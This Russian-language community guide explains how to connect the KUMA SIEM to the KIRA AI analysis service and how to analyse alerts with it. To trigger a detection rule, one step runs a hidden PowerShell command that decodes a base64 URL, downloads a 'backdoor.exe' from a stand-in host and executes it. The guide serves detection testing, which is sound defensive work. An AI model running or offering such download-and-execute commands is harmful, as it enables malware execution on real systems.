# Настройка интеграции с KIRA и примеры использования

<p class="callout info">Информация, приведенная на данной странице, является разработкой команды pre-sales и/или community KUMA и **НЕ** является официальной рекомендацией вендора.</p>

<p class="callout info">Официальная документация по данному разделу приведена в онлайн-справке на продукт:   
[https://support.kaspersky.ru/kuma/4.0/294800](https://support.kaspersky.ru/kuma/4.0/294800)</p>

<p class="callout success">Видео по работе KIRA и ключевые преимущества:  
[https://box.kaspersky.com/f/48a6de7a26044d9ea60c/](https://box.kaspersky.com/f/48a6de7a26044d9ea60c/) </p>

**Kaspersky Investigation &amp; Response Assistant** (далее — KIRA) — это облачный сервис на базе искусственного интеллекта для анализа событий информационной безопасности.

KIRA выполняет детальный разбор командных строк и скриптов Windows и Linux с возможностью деобфускации, формирует краткое описание их назначения и предоставляет аналитическую информацию, необходимую для ускорения расследования инцидентов и приоритизации алертов.

Для использования сервиса ИИ KIRA необходимо:

- Наличие **действующей лицензии с** **модулем AI**.
- Наличие файла сертификата в формате PFX, запакованного в архив &lt;имя заказчика&gt;.ZIP, и пароля к сертификату для отправки запросов.

<p class="callout info">Для получения сертификата и пароля обратитесь к сотрудникам Лаборатории Касперского или представителям партнера.</p>

- Наличие у пользователя одной из ролей: Главный администратор, Администратор, Аналитик 2-го уровня, Аналитик 1-го уровня, Младший аналитик.

<p class="callout info">Настройка интеграции KIRA доступна только пользователю с ролью Главный администратор.</p>

---

### Настройка интеграции с KIRA

Чтобы настроить интеграцию с KIRA:

- Перейдите в раздел **Параметры** → **Интеграции** → **AI-сервисы**.
- В открывшемся окне перейдите на вкладку **Kaspersky Investigation &amp; Response Assistant.**
- Включите интеграцию с KIRA, установив переключатель **Статус** в активное положение.
- Нажмите **Выбрать файл** и загрузите архив &lt;имя заказчика&gt;.ZIP, в котором содержится сертификат в формате PFX.
- В поле **Пароль от сертификата** укажите пароль.
- Сервис KIRA отправляет запросы в облачный сервис, поэтому если в инфраструктуре используется прокси-сервер для доступа в Интернет выберите в раскрывающемся списке **Прокси**-**сервер** ранее созданный ресурс или создайте новый.
- В раскрывающемся списке выберите язык ответа на запрос в KIRA: русский или английский. KUMA будет передавать и хранить ответы KIRA на выбранном языке.
- Нажмите **Сохранить**. После того как вы нажмете **Сохранить**, вам будет предложено принять условия **Лицензионного соглашения**. Если вы не примете соглашение, сохранить параметры и продолжить работу с сервисом будет невозможно.

[![image481.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image481.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image481.png)

После сохранения параметров будет показано доступное количество токенов. Количество токенов обновляется ежедневно.

Интеграция с сервисом KIRA успешно настроена. Анализ будет доступен для всех событий, как новых, так и уже полученных.

---

### Выполнение анализа с помощью KIRA

После того как интеграция настроена, можно выполнять анализ команд или скриптов с помощью KIRA.

Для примера создадим новый алерт, но Вы также можете использовать события из уже сформированного алерта:

- Убедитесь, что правило **R110\_04\_Сокрытие окна выполнения PowerShell скрипта** привязано к коррелятору. Для этого: 
    - Перейдите в **Ресурсы** → **Активные сервисы**
    - Выберите сервис **Коррелятора**
    - В окне **Редактирование коррелятора** перейдите на шаг **Корреляция**
    - В поле Поиск введите «**110\_04**»
    - Убедитесь, что правило **R110\_04\_Сокрытие окна выполнения PowerShell скрипта** присутствует в списке.
    - Если правило отсутствует в списке выполните привязку правила аналогично Статьям **[Создание правила корреляции типа Simple](https://kb.kuma-community.ru/books/pravila-korreliacii-v-kuma-cookbook/page/prostoe-pravilo-simple)** или **[Создание правила корреляции типа Standard](https://kb.kuma-community.ru/books/pravila-korreliacii-v-kuma-cookbook/page/standartnoe-pravilo-standard#bkmrk-%D0%A1%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5-%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D0%B0-%D0%BA%D0%BE%D1%80).**

[![image482.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image482.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image482.png)

- Убедитесь, что события **Windows A new process has been created** (Event ID 4688) поступают с тестовой рабочей станции. Для этого: 
    - Перейдите в раздел **События**.
    - Укажите следующий поисковый запрос:

```sql
SELECT * FROM `events` WHERE DeviceEventClassID = '4688' AND DeviceHostName = '<имя тестовой рабочей станции>'  ORDER BY Timestamp DESC LIMIT 250
```

- - Нажмите **Выполнить запрос**
    - Убедитесь, что события **A new process has been created** отображаются в таблице событий.
    - Если события **A new process has been created** отсутствуют в таблице событий выполните настройку сбора событий с EventID 4688 согласно Статье [Настройка получения событий Windows](https://kb.kuma-community.ru/books/podkliucenie-istocnikov/page/ms-wec#bkmrk-%D0%9D%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8-%D0%B0).

[![image.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/xn5image.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/xn5image.png)

- На тестовой рабочей станции откройте консоль PowerShell и выполните следующую команду:

```powershell
powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -W Hidden -Command "$s = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2E3Mzk2ZDYxY2FmZmUxOGE0Y2ZmYmIzYjQyOGM5YjYwLmNvbS9kL2JhY2tkb29yLmV4ZQ==')); iwr $s -OutFile backdoor.exe; Start-Process .\backdoor.exe"
```

- В веб-интерфейсе KUMA перейдите в раздел **Алерты** и убедитесь, что алерт **R110\_04\_Сокрытие окна выполнения PowerShell** скрипта появился в таблице алертов.

[![image483.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image483.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image483.png)

Чтобы выполнить анализ:

- Нажмите на название алерта **R110\_04\_Сокрытие окна выполнения PowerShell скрипта**.
- В секции **Связанные события** нажмите **Найти в событиях**.
- В открывшемся окне **Расследование алерта** откройте карточку базового или корреляционного события.
- Наведите на поле **DeviceCustomString4**, в котором содержится текст выполненного скрипта, и нажмите на символ [![image.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/Rezimage.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/Rezimage.png)
- В раскрывающемся списке выберите **Проанализировать с** **помощью KIRA**.

[![image485.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image485.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image485.png)

<p class="callout success">Альтернативный способ отправки запросов в KIRA: на панели инструментов в карточке события в раскрывающемся списке **Проанализировать с помощью KIRA** выберите поле, значение которого вы хотите проанализировать.</p>

[![image486.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image486.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image486.png)

- В открывшемся окне **Проанализировать с KIRA** отобразится команда для анализа. Обратите внимание, что base64 строка, содержащаяся в скрипте, была автоматически деобфусцирована.

[![image487.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image487.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image487.png)

Чтобы ознакомиться с отчетом об деобфускации нажмите **Действия** и выберите **Посмотреть отчет по деобфускации.**

[![image488.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image488.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image488.png)

- Если вы хотите предварительно определить количество токенов, которые будут затрачены на анализ, в раскрывающемся списке **Действия** выберите **Рассчитать размер в токенах**. Количество токенов для анализа = количество токенов на отправку запроса + количество токенов на ответ.

[![image489.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image489.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image489.png)

- Чтобы проанализировать команду, нажмите кнопку **Проанализировать**. Если токенов достаточно, запустится выполнение анализа и появится задача **Запрос в KIRA**. Выполнение запроса может занимать от 30 секунд и дольше.

<p class="callout info">Возможность редактирования запроса перед отправкой в KIRA обеспечивает дополнительный уровень контроля над конфиденциальностью данных. Это особенно важно в случаях, когда анализируемые строки кода содержат чувствительную информацию, такую как персональные данные, учетные записи или ключи доступа.</p>

- Результат анализа доступен в том же окне **Проанализировать с помощью KIRA**: вывод, краткое содержание и развернутый анализ.

[![image490.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image490.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image490.png)

После выполнения анализа результат будет отображаться в карточке события на вкладке **Анализ KIRA** и будет доступен для просмотра всем пользователям с доступом к функциональности **Проанализировать с помощью KIRA**.

<p class="callout info">Результаты анализа KIRA хранятся в кэше в течение 14 дней.</p>

[![image491.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image491.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image491.png)

Также можно просмотреть результат анализа в разделе **Диспетчер задач** в свойствах задачи **Запрос** **в KIRA**. При нажатии на название задачи, в контекстном меню будут доступны следующие действия:

- **Посмотреть результат -** в этом случае любой пользователь с доступом к задачам KIRA может просмотреть результаты выполнения задачи из кэша и токены не будут потрачены.
- **Перезапустить** - в этом случае анализ будет выполнен без учета данных предыдущего анализа, хранящихся в кеше, и токены будут потрачены на выполнение анализа.

[![image492.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image492.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image492.png)

Помимо отправки запросов в KIRA при расследовании алертов запросы можно отправлять непосредственно из раздела **События**.

[![image493.png](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/scaled-1680-/image493.png)](https://kb.kuma-community.ru/uploads/images/gallery/2026-08/image493.png)

---

### Примеры команд для анализа KIRA

<p class="callout warning">Команды нерабочие все ссылки заменены, но это не отменяет перепроверку и аккуратность использования!</p>

Ссылка на примеры:  
[https://github.com/KUMA-Community/kuma\_content/blob/main/kira/usecases.md](https://github.com/KUMA-Community/kuma_content/blob/main/kira/usecases.md)